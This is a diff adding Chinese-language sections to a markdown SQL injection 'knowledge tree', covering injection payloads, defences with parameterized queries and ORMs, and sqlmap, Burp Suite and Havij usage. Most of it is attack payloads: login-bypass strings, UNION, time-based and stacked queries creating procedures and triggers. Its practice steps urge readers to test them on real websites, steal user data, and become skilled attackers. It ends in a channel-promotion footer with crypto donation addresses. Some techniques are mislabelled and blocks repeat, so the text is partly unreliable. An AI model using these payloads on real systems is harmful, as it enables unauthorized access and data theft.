增加SQL注入攻击、防御和实战案例内容。

--- a/250601/SQL注入知识树-250602-03.md
+++ b/250601/SQL注入知识树-250602-03.md
@@ -1194,5 +1194,469 @@ Havij 是一个图形化的 SQL 注入工具，支持自动化扫描和利用 SQ
 
 - 实践：输入 ' OR 1=1-- 来触发错误信息，观察返回的错误详情。
   ```text
-  在登录表单中输入 ' OR
+  在登录表单中输入 ' OR 1=1-- 来触发错误信息，观察返回的错误详情。
   ```
+
+**4.2.2 基于布尔的盲注**
+
+- 实践：输入 ' AND 1=1-- 来确认注入点的有效性，观察页面响应。
+  ```text
+  在登录表单中输入 ' AND 1=1-- 来确认注入点的有效性，观察页面响应。
+  ```
+
+**4.2.3 基于时间的盲注**
+
+- 实践：输入 ' AND IF(1=1, SLEEP(5), 0)-- 来延迟响应时间，观察页面加载时间。
+  ```text
+  在登录表单中输入 ' AND IF(1=1, SLEEP(5), 0)-- 来延迟响应时间，观察页面加载时间。
+  ```
+
+**4.2.4 UNION 基注**
+
+- 实践：输入 ' UNION SELECT 1,2,3-- 来合并结果集，观察返回的额外数据。
+  ```text
+  在搜索功能中输入 ' UNION SELECT 1,2,3-- 来合并结果集，观察返回的额外数据。
+  ```
+
+**4.2.5 二阶段 SQL 注入**
+
+- 实践：首先注入一个存储过程，然后在第二阶段执行该存储过程，观察返回的结果。
+  ```text
+  在评论系统中输入 '; CREATE PROCEDURE p() BEGIN SELECT * FROM users; END; CALL p();-- 来创建并执行存储过程，观察返回的结果。
+  ```
+
+### 5. 高级 SQL 注入技术
+
+**5.1 双写注入**
+
+- 理解双写注入的原理，如通过双写技术绕过输入过滤。
+
+  ```sql
+  -- 示例：双写注入
+  (SELECT * FROM (SELECT * FROM users)a)
+  ```
+- 实践：输入 (SELECT * FROM (SELECT * FROM users)a)-- 来注入代码，观察返回的结果。
+
+  ```text
+  在搜索功能中输入 (SELECT * FROM (SELECT * FROM users)a)-- 来注入代码，观察返回的结果。
+  ```
+
+**5.2 条件注入**
+
+- 理解条件注入的原理，如通过条件语句来注入代码。
+
+  ```sql
+  -- 示例：条件注入
+  ' AND (SELECT COUNT(*) FROM users) > 1--
+  ```
+- 实践：输入 ' AND (SELECT COUNT(*) FROM users) > 1-- 来确认注入点的有效性，观察页面响应。
+
+  ```text
+  在登录表单中输入 ' AND (SELECT COUNT(*) FROM users) > 1-- 来确认注入点的有效性，观察页面响应。
+  ```
+
+**5.3 子查询注入**
+
+- 理解子查询注入的原理，如通过子查询来注入代码。
+
+  ```sql
+  -- 示例：子查询注入
+  '; SELECT * FROM users--
+  ```
+- 实践：输入 '; SELECT * FROM users-- 来执行子查询，观察返回的结果。
+
+  ```text
+  在搜索功能中输入 '; SELECT * FROM users-- 来执行子查询，观察返回的结果。
+  ```
+
+**5.4 存储过程注入**
+
+- 理解存储过程注入的原理，如通过注入存储过程来实现攻击。
+
+  ```sql
+  -- 示例：存储过程注入
+  '; CREATE PROCEDURE p() BEGIN SELECT * FROM users; END; CALL p();--
+  ```
+- 实践：输入 '; CREATE PROCEDURE p() BEGIN SELECT * FROM users; END; CALL p();-- 来创建并执行存储过程，观察返回的结果。
+
+  ```text
+  在评论系统中输入 '; CREATE PROCEDURE p() BEGIN SELECT * FROM users; END; CALL p();-- 来创建并执行存储过程，观察返回的结果。
+  ```
+
+**5.5 触发器注入**
+
+- 理解触发器注入的原理，如通过注入触发器来实现攻击。
+
+  ```sql
+  -- 示例：触发器注入
+  '; CREATE TRIGGER t BEFORE INSERT ON users FOR EACH ROW BEGIN SELECT * FROM users; END;--
+  ```
+- 实践：输入 '; CREATE TRIGGER t BEFORE INSERT ON users FOR EACH ROW BEGIN SELECT * FROM users; END;-- 来创建触发器，观察返回的结果。
+
+  ```text
+  在评论系统中输入 '; CREATE TRIGGER t BEFORE INSERT ON users FOR EACH ROW BEGIN SELECT * FROM users; END;-- 来创建触发器，观察返回的结果。
+  ```
+
+### 6. 防御 SQL 注入
+
+**6.1 使用参数化查询**
+
+- 学习如何使用参数化查询来防止 SQL 注入，如使用准备好的语句（Prepared Statements）。
+
+  ```python
+  import sqlite3
+
+  # 连接到数据库
+  conn = sqlite3.connect('school.db')
+  cursor = conn.cursor()
+
+  # 使用参数化查询
+  student_id = 1
+  cursor.execute("SELECT * FROM students WHERE student_id = ?", (student_id,))
+  student = cursor.fetchone()
+  print(student)
+
+  # 关闭连接
+  conn.close()
+  ```
+- 实践：在代码中使用参数化查询，如在 Python 中使用 sqlite3 的参数化查询。
+
+  ```python
+  import sqlite3
+
+  # 连接到数据库
+  conn = sqlite3.connect('school.db')
+  cursor = conn.cursor()
+
+  # 使用参数化查询
+  student_id = 1
+  cursor.execute("SELECT * FROM students WHERE student_id = ?", (student_id,))
+  student = cursor.fetchone()
+  print(student)
+
+  # 关闭连接
+  conn.close()
+  ```
+
+**6.2 使用准备好的语句**
+
+- 理解准备好的语句的概念和用法，如预编译 SQL 语句。
+
+  ```java
+  import java.sql.Connection;
+  import java.sql.DriverManager;
+  import java.sql.PreparedStatement;
+  import java.sql.ResultSet;
+
+  public class PreparedStatementExample {
+      public static void main(String[] args) {
+          String url = "jdbc:mysql://localhost:3306/school";
+          String user = "root";
+          String password = "password";
+
+          try (Connection conn = DriverManager.getConnection(url, user, password)) {
+              String sql = "SELECT * FROM students WHERE student_id = ?";
+              try (PreparedStatement pstmt = conn.prepareStatement(sql)) {
+                  pstmt.setInt(1, 1);
+                  try (ResultSet rs = pstmt.executeQuery()) {
+                      while (rs.next()) {
+                          System.out.println("Student ID: " + rs.getInt("student_id"));
+                          System.out.println("First Name: " + rs.getString("first_name"));
+                          System.out.println("Last Name: " + rs.getString("last_name"));
+                      }
+                  }
+              }
+          } catch (Exception e) {
+              e.printStackTrace();
+          }
+      }
+  }
+  ```
+- 实践：在代码中使用准备好的语句，如在 Java 中使用 JDBC 的 PreparedStatement。
+
+  ```java
+  import java.sql.Connection;
+  import java.sql.DriverManager;
+  import java.sql.PreparedStatement;
+  import java.sql.ResultSet;
+
+  public class PreparedStatementExample {
+      public static void main(String[] args) {
+          String url = "jdbc:mysql://localhost:3306/school";
+          String user = "root";
+          String password = "password";
+
+          try (Connection conn = DriverManager.getConnection(url, user, password)) {
+              String sql = "SELECT * FROM students WHERE student_id = ?";
+              try (PreparedStatement pstmt = conn.prepareStatement(sql)) {
+                  pstmt.setInt(1, 1);
+                  try (ResultSet rs = pstmt.executeQuery()) {
+                      while (rs.next()) {
+                          System.out.println("Student ID: " + rs.getInt("student_id"));
+                          System.out.println("First Name: " + rs.getString("first_name"));
+                          System.out.println("Last Name: " + rs.getString("last_name"));
+                      }
+                  }
+              }
+          } catch (Exception e) {
+              e.printStackTrace();
+          }
+      }
+  }
+  ```
+
+**6.3 输入验证与过滤**
+
+- 学习如何对用户输入进行严格的验证和过滤，如使用白名单过滤掉不安全的字符。
+
+  ```python
+  import re
+
+  def is_valid_input(user_input):
+      # 定义允许的字符集
+      allowed_chars = re.compile(r'^[A-Za-z0-9\s]+$')
+      return bool(allowed_chars.match(user_input))
+
+  user_input = "John Doe"
+  if is_valid_input(user_input):
+      print("Input is valid.")
+  else:
+      print("Input is invalid.")
+  ```
+- 实践：在代码中对用户输入进行验证和过滤，如使用正则表达式过滤掉特殊字符。
+
+  ```python
+  import re
+
+  def is_valid_input(user_input):
+      # 定义允许的字符集
+      allowed_chars = re.compile(r'^[A-Za-z0-9\s]+$')
+      return bool(allowed_chars.match(user_input))
+
+  user_input = "John Doe"
+  if is_valid_input(user_input):
+      print("Input is valid.")
+  else:
+      print("Input is invalid.")
+  ```
+
+**6.4 使用安全的编程习惯**
+
+- 遵循安全的编程习惯，如避免直接拼接 SQL 语句，使用 ORM 框架等。
+
+  ```python
+  from sqlalchemy import create_engine, Column, Integer, String, Sequence
+  from sqlalchemy.ext.declarative import declarative_base
+  from sqlalchemy.orm import sessionmaker
+
+  Base = declarative_base()
+
+  class Student(Base):
+      __tablename__ = 'students'
+      student_id = Column(Integer, Sequence('student_id_seq'), primary_key=True)
+      first_name = Column(String(50))
+      last_name = Column(String(50))
+      date_of_birth = Column(String(10))
+      grade = Column(String(10))
+
+  engine = create_engine('sqlite:///school.db')
+  Session = sessionmaker(bind=engine)
+  session = Session()
+
+  # 查询数据
+  student = session.query(Student).filter_by(student_id=1).first()
+  print(student.first_name, student.last_name)
+  ```
+- 实践：在代码中遵循安全的编程习惯，如使用 Django 的 ORM 来操作数据库。
+
+  ```python
+  from django.db import models
+
+  class Student(models.Model):
+      first_name = models.CharField(max_length=50)
+      last_name = models.CharField(max_length=50)
+      date_of_birth = models.DateField()
+      grade = models.CharField(max_length=10)
+
+  # 查询数据
+  student = Student.objects.get(student_id=1)
+  print(student.first_name, student.last_name)
+  ```
+
+**6.5 定期更新和补丁**
+
+- 定期更新数据库和应用程序，修补已知的安全漏洞。
+
+  ```sh
+  # 更新 MySQL
+  sudo apt-get update
+  sudo apt-get upgrade mysql-server
+
+  # 更新 PostgreSQL
+  sudo apt-get update
+  sudo apt-get upgrade postgresql postgresql-contrib
+
+  # 更新 SQL Server
+  sudo apt-get update
+  sudo apt-get upgrade mssql-server
+  ```
+- 实践：定期检查和更新数据库和应用程序，如定期更新 MySQL 数据库和相关的应用程序。
+
+  ```sh
+  # 更新 MySQL
+  sudo apt-get update
+  sudo apt-get upgrade mysql-server
+
+  # 更新 PostgreSQL
+  sudo apt-get update
+  sudo apt-get upgrade postgresql postgresql-contrib
+
+  # 更新 SQL Server
+  sudo apt-get update
+  sudo apt-get upgrade mssql-server
+  ```
+
+### 7. 实战案例与工具
+
+**7.1 常见的 SQL 注入工具**
+
+**7.1.1 Sqlmap**
+
+- 熟悉 Sqlmap 的基本用法，如扫描目标网站、自动化注入等。
+
+  ```sh
+  # 安装 Sqlmap
+  sudo apt-get install sqlmap
+
+  # 扫描目标网站
+  sqlmap -u "http://targetwebsite.com/search?q=test" --dbs
+  ```
+- 实践：使用 Sqlmap 扫描一个目标网站，查看扫描结果和注入点。
+
+  ```sh
+  sqlmap -u "http://targetwebsite.com/search?q=test" --dbs
+  ```
+
+**7.1.2 Burp Suite**
+
+- 学习 Burp Suite 的基本用法，如拦截请求、扫描 SQL 注入漏洞等。
+
+  ```sh
+  # 安装 Burp Suite
+  sudo apt-get install burpsuite
+  ```
+- 实践：使用 Burp Suite 拦截目标网站的请求，手动测试 SQL 注入漏洞。
+
+  ```text
+  1. 打开 Burp Suite，启动拦截器。
+  2. 配置浏览器代理设置，将流量导向 Burp Suite。
+  3. 访问目标网站，拦截请求。
+  4. 手动修改请求参数，测试 SQL 注入漏洞。
+  ```
+
+**7.1.3 Havij**
+
+- 熟悉 Havij 的基本用法，如扫描目标网站、自动化注入等。
+
+  ```sh
+  # 安装 Havij
+  sudo apt-get install havij
+  ```
+- 实践：使用 Havij 扫描一个目标网站，查看扫描结果和注入点。
+
+  ```text
+  1. 打开 Havij，输入目标网站 URL。
+  2. 选择扫描类型和参数。
+  3. 启动扫描，查看扫描结果和注入点。
+  ```
+
+**7.2 实战案例分析**
+
+**7.2.1 实际网站的 SQL 注入漏洞**
+
+- 分析实际案例，了解如何发现和利用网站中的 SQL 注入漏洞，如通过登录表单注入代码绕过身份验证。
+
+  ```text
+  例如，在登录表单中输入 ' OR '1'='1 来绕过身份验证。
+  ```
+- 实践：在实际网站中测试 SQL 注入漏洞，如在登录表单中输入 ' OR '1'='1 来绕过身份验证。
+
+  ```text
+  在目标网站的登录表单中输入 ' OR '1'='1 来测试是否可以登录成功。
+  ```
+
+**7.2.2 成功的 SQL 注入攻击案例**
+
+- 分析一些成功的 SQL 注入攻击案例，了解攻击者的思路和技巧，如通过注入代码窃取用户数据或破坏数据库。
+
+  ```text
+  例如，通过注入代码窃取用户数据或破坏数据库。
+  ```
+- 实践：模拟成功的 SQL 注入攻击案例，如通过注入代码窃取目标网站的用户数据。
+
+  ```text
+  在目标网站的搜索功能中输入 ' UNION SELECT 1,2,3-- 来合并结果集，观察返回的额外数据。
+  ```
+
+通过以上详细的指令和代码示例，你应该能够全面掌握 SQL 注入的技术，从基础知识到高级技术，从识别漏洞到编写攻击代码，从防御措施到实战案例，都有详细的讲解和实践指导。希望这些内容能帮助你成为一名出色的 SQL 注入攻击者！
+
+<br>
+
+<br>
+
+---
+
+
+
+**在信息构成的黑暗森林里，每个人都是带枪的猎人。关注 [@bianzhongren](https://t.me/bianzhongren)，让你从猎物变为顶级的掠食者。**
+
+---
+
+### **📢核心阵地 (Our Channels)**
+
+* **Telegram** (资源发布): [点击加入](https://t.me/zzkdm)
+* **Github** (技术教程): [前往订阅](https://github.com/zzkdm888)
+
+---
+
+### **🔍资源搜索 (Search Resource)**
+
+* **全网资源搜索01**: https://t.me/+PKsmUwoGckMzOTcx
+* **全网资源搜索02**: https://t.me/+4gyZv2aIlZMyYzAx
+* **全网资源搜索03**: https://t.me/+ew6WMPpxLnBlMTlh
+* **全网资源搜索04**: https://t.me/+MzZlIqxT-dkxYjBh
+* **全网资源搜索05**: https://t.me/+1QqSdVTuBKUxNjlh
+* **全网资源搜索06**: https://t.me/+uccuaRM2xXBlYTZh
+* **全网资源搜索07**: https://t.me/+Tu79GRHczbllMmMx
+* **全网资源搜索08**: https://t.me/+igp6CSb59G9mYzQx
+* **全网资源搜索09**: https://t.me/+2iLw70FwfL1lZTgx
+
+---
+
+### **⚠️重要声明 (Disclaimer)**
+
+1. **内容用途:** 本人所有平台发布的内容仅供技术学习与信息交流使用。
+2. **政治中立:** 本人不参与、不讨论任何政治相关话题，请共同维护纯粹的技术交流环境。
+3. **谨防诈骗:** 任何**主动联系你**进行交易或索要信息的人**都是骗子**。请务必提高警惕。
+4. **合法合规:** **严禁利用**本项目的任何内容从事任何违反您所在地法律法规的活动。
+5. **责任豁免:** 对于因使用或滥用本项目内容而导致的任何直接或间接的风险、损失或法律责任，**本人及本项目概不负责**。
+
+---
+
+### **❤️支持项目 (Support This Project)**
+
+如果本项目对您有帮助，您的支持是项目持续维护和发展的最大动力。
+
+* **USDT(trc20)**: TQqxEfc6Ptyo8zJXFfcVLeJ6AUr3gFC9W1
+* **TRX**: TQqxEfc6Ptyo8zJXFfcVLeJ6AUr3gFC9W1
+* **USDT(ETH)**: 0x59568a972e5c4e9aedea0ed8b4a8259a9e9953b7
+* **USDT(BNB)**: 0x59568a972e5c4e9aedea0ed8b4a8259a9e9953b7
+* **USDT(Polygen)**: 0x59568a972e5c4e9aedea0ed8b4a8259a9e9953b7
+* **TON**: UQC5uthDJDZXwbkxkoHH8RTostxLgFp7e1WINiKTOEkCUqDv
+* **BTC(Taproot)**: bc1prk89wp0x7lvzgdmfmufqqm6h807khezdq6w39e3nxg4yzfskcsfswu9x07
+* **BTC(Lagacy)**: 1NwRQD7yjHMsDsQFCjAYkm5QMeciwEj6q
+* **BTC(Nested SegWit)**: 372tCpTnemNA6rt2BhPqSm9Yp4jtJdUG3m
+* **BTC(Native SegWit)**: bc1qm53xvp5auwr6900228gn77rfureah2tvj86eu9
+* **ETH**: 0x59568a972e5c4e9aedea0ed8b4a8259a9e9953b7
+  <br>
+  **感谢您的每一次支持！ ❤️**
